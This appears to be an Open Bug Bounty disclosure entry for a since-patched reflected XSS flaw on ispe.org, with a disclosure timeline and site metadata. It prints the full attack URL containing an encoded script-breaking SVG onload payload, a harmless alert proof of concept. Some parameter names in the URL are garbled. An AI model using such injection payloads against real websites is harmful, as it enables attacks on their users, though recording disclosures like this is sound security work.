ispe.org XSS vulnerability

2015-12-01T08:28:00
ID OBB:111148
Type openbugbounty
Reporter Inetizen01K
Modified 2017-11-23T09:48:00

Description

Vulnerable URL:
http://www.ispe.org/index.php?ci_id=8909&la;_id=1⁡_id=0&advanced;=false&page;=1&page;_count=1&filter;=no&tax;=0&index;_uuid=X6C994F1-E684-7109-3B7C943EE7DB3660&q;=%22--%3E+%3C%2Fscript%3E%3Csvg%2Fonload%3D%27%3Balert%28%2FXSSPOSED%2F%29%3B%27%3E&no-andMod;=%2B|0&no-and;=&no-phraseMod;=%2B|%2B&no-phrase-input;=&no-phrase;=&no-orMod;=+|%2B&no-or;=&no-notMod;=-|0&no-not;=&page-results;=20&query;=
Details:

Description| Value
---|---
Patched:| Yes, at 23.11.2017
Latest check for patch:| 23.11.2017 09:48 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 248593
Google Pagerank| 6
VIP website status:| No
Check ispe.org SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 1 December, 2015 08:28 GMT
Vulnerability existence verified and confirmed| 1 December, 2015 08:31 GMT
Vulnerability patched by the website owner| 23 November, 2017 09:48 GMT